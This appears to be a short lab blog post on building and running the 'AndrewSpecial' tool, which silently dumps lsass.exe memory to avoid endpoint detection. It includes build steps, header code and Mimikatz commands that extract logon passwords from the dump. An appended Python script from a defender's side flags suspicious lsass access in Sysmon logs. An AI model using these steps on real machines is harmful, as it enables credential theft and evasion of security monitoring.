AndrewSpecial – stealthy lsass.exe memory dumping

Ultra short entry here. After reading a very interesting article on bypassing one endpoint security product to silently dump lsass.exe without getting detected,

one will of course want to reproduce the steps, and since the code is available here:

I have just done that in my lab.

The notes below might save a few seconds if one gets stuck compiling it. (I have used Visual Studio 2013 on Win7 SP1 64-bit to build it.)

# On Windows build server just download the

Modify AndrewSpecial.h to include the additional #pragma comment (lib, "advapi32.lib"):

#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <DbgHelp.h>

#pragma comment (lib, "Dbghelp.lib")
#pragma comment (lib, "ntdll.lib")
#pragma comment (lib, "advapi32.lib")   // added: needed by the linker for the advapi32 calls

void getversion_long();
bool AndrewSpecial(const wchar_t * ProcessName);
// RtlGetVersion is resolved from ntdll at runtime; this is its prototype
typedef NTSTATUS(NTAPI* RtlGetVersion_t)(_Out_ PRTL_OSVERSIONINFOW lpVersionInformation);

// Major/minor version packed as 0xMMmm00 for comparison against RtlGetVersion output
enum supported_versions {
    win8  = 0x060200,
    win81 = 0x060300,
    win10 = 0x0A0000,
};

Open up the 64-bit VS2013 x64 Native Tools Command Prompt and cd to the source directory:

cl *.cpp /DUNICODE

Next, we transfer the compiled Andrew.exe binary to our testing-lab Windows 10 box and execute it.

The resulting Andrew.dmp can be fed to a separate instance of Mimikatz on some other machine as follows:

mimikatz # sekurlsa::minidump Andrew.dmp
mimikatz # sekurlsa::logonPasswords
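A defender's counterpart to the procedure above, added here and not part of the original post or the AndrewSpecial project: a Python triage of Sysmon Event ID 10 (ProcessAccess) records that flags handles to lsass.exe carrying the PROCESS_VM_READ and PROCESS_QUERY_INFORMATION rights a DbgHelp-style minidump needs, and rates them higher when dbghelp.dll or dbgcore.dll appears in the call trace. The allowlist, the sample records and every file path in them are constructed assumptions.

```python
# Win32 process access rights (winnt.h values).
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
# MiniDumpWriteDump needs both of these on the target process handle.
MINIDUMP_REQUIRED = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION
# Starter allowlist of images that legitimately open lsass.exe (assumption, tune per host).
ALLOWLISTED_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
# A call trace through these libraries points at a MiniDump-style dumper.
DUMP_LIBRARIES = ("dbghelp.dll", "dbgcore.dll")


def triage_process_access(event):
    """Rate one Sysmon Event ID 10 record: "high", "medium" or None (benign)."""
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return None
    source = event["SourceImage"].rsplit("\\", 1)[-1].lower()
    if source in ALLOWLISTED_SOURCES:
        return None
    granted = int(event["GrantedAccess"], 16)
    if granted & MINIDUMP_REQUIRED != MINIDUMP_REQUIRED:
        return None  # handle cannot read lsass memory, so no dump is possible
    trace = event.get("CallTrace", "").lower()
    if any(lib in trace for lib in DUMP_LIBRARIES):
        return "high"
    return "medium"  # dump-capable handle from an unknown image: investigate


def triage_all(events):
    """Return [(SourceImage, rating)] for every record that is not benign."""
    return [(ev["SourceImage"], r) for ev in events
            if (r := triage_process_access(ev))]


# Constructed sample records using Sysmon Event ID 10 field names; not real telemetry.
LSASS = r"C:\Windows\System32\lsass.exe"
NTDLL = r"C:\Windows\SYSTEM32\ntdll.dll+9c534"
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1000", "CallTrace": NTDLL},      # QUERY_LIMITED_INFORMATION only
    {"SourceImage": r"C:\Users\lab\Andrew.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff", "CallTrace": NTDLL + r"|C:\Windows\SYSTEM32\dbghelp.dll+1a2b3"},
    {"SourceImage": r"C:\Users\lab\unknown.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1410", "CallTrace": NTDLL},      # QUERY_INFORMATION | VM_READ
    {"SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff", "CallTrace": NTDLL},    # allowlisted system process
]

if __name__ == "__main__":
    for src, rating in triage_all(SAMPLE_EVENTS):
        print(f"{rating.upper()}: dump-capable lsass.exe handle opened by {src}")
```

Access masks such as 0x1fffff (PROCESS_ALL_ACCESS) or 0x1410 both contain the two required bits, which is why the mask check rather than an exact-value match is used.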

Courtesy of CaledoniaProject


About astr0baby
